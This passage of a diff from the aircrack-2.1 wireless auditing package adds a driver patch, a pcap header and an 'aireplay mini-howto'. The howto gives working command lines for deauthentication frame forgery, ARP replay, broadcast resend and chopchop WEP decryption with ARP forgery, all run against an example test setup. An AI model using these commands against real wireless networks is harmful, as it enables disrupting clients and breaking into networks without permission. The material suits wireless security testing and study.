2497 | +++ aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 2005-04-22 08:51:21.937064360 +0200 | |
2498 | @@ -0,0 +1,12 @@ | |
2499 | +diff -u prism54/islpci_eth.c prism54-diff/islpci_eth.c | |
2500 | +--- prism54/islpci_eth.c 2004-12-24 16:33:51.000000000 -0500 | |
2501 | ++++ prism54-diff/islpci_eth.c 2005-03-02 16:44:15.000000000 -0500 | |
2502 | +@@ -99,7 +99,7 @@ | |
2503 | + | |
2504 | + /* determine the amount of fragments needed to store the frame */ | |
2505 | + | |
2506 | +- frame_size = skb->len < ETH_ZLEN ? ETH_ZLEN : skb->len; | |
2507 | ++ frame_size = skb->len; | |
2508 | + if (init_wds) | |
2509 | + frame_size += 6; | |
2510 | + | |
2511 | diff -urN aircrack-2.1.orig/pcap-aireplay.h aircrack-2.1/pcap-aireplay.h | |
2512 | --- aircrack-2.1.orig/pcap-aireplay.h 1970-01-01 01:00:00.000000000 +0100 | |
2513 | +++ aircrack-2.1/pcap-aireplay.h 2005-04-22 08:51:21.937064360 +0200 | |
2514 | @@ -0,0 +1,40 @@ | |
2515 | +#ifndef _COMMON_H | |
2516 | +#define _COMMON_H | |
2517 | + | |
2518 | +#include <sys/time.h> | |
2519 | + | |
2520 | +#define IVSONLY_MAGIC "\xBF\xCA\x84\xD4" | |
2521 | +#define TCPDUMP_MAGIC 0xA1B2C3D4 | |
2522 | +#define TCPDUMP_CIGAM 0xD4C3B2A1 | |
2523 | +#define PCAP_VERSION_MAJOR 2 | |
2524 | +#define PCAP_VERSION_MINOR 4 | |
2525 | +#define LINKTYPE_ETHERNET 1 | |
2526 | +#define LINKTYPE_IEEE802_11 105 | |
2527 | +#define LINKTYPE_PRISM_HEADER 119 | |
2528 | + | |
2529 | +struct pcap_file_header | |
2530 | +{ | |
2531 | + unsigned int magic; | |
2532 | + unsigned short version_major; | |
2533 | + unsigned short version_minor; | |
2534 | + int thiszone; | |
2535 | + unsigned int sigfigs; | |
2536 | + unsigned int snaplen; | |
2537 | + unsigned int linktype; | |
2538 | +}; | |
2539 | + | |
2540 | +struct pcap_pkthdr | |
2541 | +{ | |
2542 | + int tv_sec; | |
2543 | + int tv_usec; | |
2544 | + unsigned int caplen; | |
2545 | + unsigned int len; | |
2546 | +}; | |
2547 | + | |
2548 | +#define SWAP32(x) \ | |
2549 | + x = ( ( ( x >> 24 ) & 0x000000FF ) | \ | |
2550 | + ( ( x >> 8 ) & 0x0000FF00 ) | \ | |
2551 | + ( ( x << 8 ) & 0x00FF0000 ) | \ | |
2552 | + ( ( x << 24 ) & 0xFF000000 ) ); | |
2553 | + | |
2554 | +#endif /* common.h */ | |
2555 | diff -urN aircrack-2.1.orig/README aircrack-2.1/README | |
2556 | --- aircrack-2.1.orig/README 1970-01-01 01:00:00.000000000 +0100 | |
2557 | +++ aircrack-2.1/README 2005-04-22 08:51:21.938064208 +0200 | |
2558 | @@ -0,0 +1,173 @@ | |
2559 | + | |
2560 | + | |
2561 | + | |
2562 | + | |
2563 | + aireplay mini-howto | |
2564 | + | |
2565 | + | |
2566 | + | |
2567 | + | |
2568 | + Example test setup: | |
2569 | + | |
2570 | + * Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1 | |
2571 | + * Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2 | |
2572 | + * Laptop with a Prism2 or Atheros of Prism54 card | |
2573 | + | |
2574 | + | |
2575 | + 0. Changes since last release | |
2576 | + ============================= | |
2577 | + | |
2578 | + * built-in chopchop operation mode | |
2579 | + * added a bunch of options in aireplay | |
2580 | + * added deauthentication frame forgery | |
2581 | + * Prism2 (wlan-ng) USB device support | |
2582 | + * Atheros (madwifi) and Prism54 device support | |
2583 | + | |
2584 | + | |
2585 | + 1. Driver recompilation | |
2586 | + ======================= | |
2587 | + | |
2588 | + 1.1. Installing linux-wlan-ng-0.2.1-pre26 | |
2589 | + ----------------------------------------- | |
2590 | + | |
2591 | +First, make sure you have updated your card's station and primary | |
2592 | +firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1. | |
2593 | + | |
2594 | +cd /usr/src | |
2595 | +wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2 | |
2596 | +tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2 | |
2597 | +cd linux-wlan-ng-0.2.1-pre26 | |
2598 | +patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 | |
2599 | +make config | |
2600 | +make all | |
2601 | +find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \; | |
2602 | +make -C src install | |
2603 | +cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/ | |
2604 | +mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~ | |
2605 | +ifconfig wlan0 down | |
2606 | +wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable | |
2607 | +/etc/init.d/pcmcia restart | |
2608 | +(reinsert card) | |
2609 | + | |
2610 | + | |
2611 | + 1.2. Installing madwifi | |
2612 | + ----------------------- | |
2613 | + | |
2614 | +Note: a tarball is also available at http://madwifi.otaku42.de/ | |
2615 | + | |
2616 | +cd /usr/src | |
2617 | +cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi | |
2618 | +cd madwifi | |
2619 | +patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1 | |
2620 | +make | |
2621 | +make install | |
2622 | +modprobe ath_pci | |
2623 | + | |
2624 | + | |
2625 | + 1.3. Installing prism54 | |
2626 | + ----------------------- | |
2627 | + | |
2628 | +Make sure the hotplug package is installed and hotplug firmware | |
2629 | +loading support is present in your kernel (module firmware_class). | |
2630 | + | |
2631 | +cd /usr/src | |
2632 | +wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2 | |
2633 | +tar -xvjf prism54-svn-latest.tar.bz2 | |
2634 | +cd prism54-svn-latest | |
2635 | +make modules | |
2636 | +make install | |
2637 | +mkdir -p /usr/lib/hotplug/firmware | |
2638 | +wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm | |
2639 | +mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890 | |
2640 | +modprobe prism54 | |
2641 | + | |
2642 | + | |
2643 | + 2. Using aireplay | |
2644 | + ================= | |
2645 | + | |
2646 | + *** aireplay does not capture replies: *** | |
2647 | + *** you must also start airodump (not Kismet!) *** | |
2648 | + | |
2649 | + If you use madwifi, you may have to place the card in | |
2650 | + pure 802.11b mode first: | |
2651 | + | |
2652 | +iwpriv ath0 mode 2 | |
2653 | + | |
2654 | + If you use wlan-ng, run ./wlanng.sh start wlan0 <channel> | |
2655 | + Otherwise run: | |
2656 | + | |
2657 | +iwconfig ath0 mode Monitor channel <channel> | |
2658 | +ifconfig ath0 up | |
2659 | + | |
2660 | + | |
2661 | + 2.1. Attack 1: deauthentication | |
2662 | + ------------------------------- | |
2663 | + | |
2664 | +This attack is especially useful to capture an ESSID or a WPA handshake; | |
2665 | +it will not generate WEP traffic (or very little). | |
2666 | + | |
2667 | +./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap | |
2668 | +./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0 | |
2669 | + | |
2670 | + | |
2671 | + 2.2. Attack 2: classic arp-request resend | |
2672 | + ----------------------------------------- | |
2673 | + | |
2674 | +./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0 | |
2675 | + | |
2676 | + | |
2677 | + 2.3. Attack 3: data broadcast resend | |
2678 | + ------------------------------------ | |
2679 | + | |
2680 | +This attack is quite unreliable and often doesn't work. You need | |
2681 | +the MAC address of an authenticated station so that the AP will | |
2682 | +not drop the packets. As most APs work in open authentication mode, | |
2683 | +if you have another wireless card, you can simply associate it | |
2684 | +and use its MAC address. | |
2685 | + | |
2686 | +./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0 | |
2687 | + | |
2688 | + | |
2689 | + 2.4. Attack 4: arp-request forgery | |
2690 | + ---------------------------------- | |
2691 | + | |
2692 | +First, we need a prga by decrypting a data packet. For this, add the -k | |
2693 | +flag which will enable KoreK's chopchop attack: | |
2694 | + | |
2695 | +./aireplay -k eth1 | |
2696 | + | |
2697 | +This attack may not work in deauthenticated mode (in which the source | |
2698 | +MAC address is forged). If this is the case, you will have the pass the | |
2699 | +address of an authenticated station: | |
2700 | + | |
2701 | +./aireplay -h 00:09:5B:FC:21:F4 -k eth1 | |
2702 | + | |
2703 | +If no station is authenticated, and you have a spare wireless card | |
2704 | +(say, an orinoco on eth1) you can use it to associate with the AP | |
2705 | +as most Access Points run in open authentication mode and do not | |
2706 | +actually check the WEP key - then use the MAC adresse of eth1 when | |
2707 | +running the chopchop attack. Having an authenticated station is | |
2708 | +also useful when there are no connected clients, so that the AP | |
2709 | +will send broadcast packets to the air (even though when don't | |
2710 | +know the WEP key yet). | |
2711 | + | |
2712 | +iwconfig eth1 mode Managed essid "whathever" key 1111111111 | |
2713 | +ifconfig eth1 up | |
2714 | + | |
2715 | +If the attack suceeded, have a look at the decrypted packet: | |
2716 | + | |
2717 | +tcpdump -e -n -t -r replay_dec-050320-023844.cap | |
2718 | + | |
2719 | +BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap | |
2720 | +SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S | |
2721 | +2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...> | |
2722 | + | |
2723 | +Now we have enough information to forge an ARP request: | |
2724 | + | |
2725 | +./airforge replay_dec-050320-023844.xor 1 00:02:2d:aa:9c:13 \ | |
2726 | +00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.cap | |
2727 | + | |
2728 | +And finally: | |
2729 | + | |
2730 | +./aireplay -r arp.cap ath0 | |
2731 | + |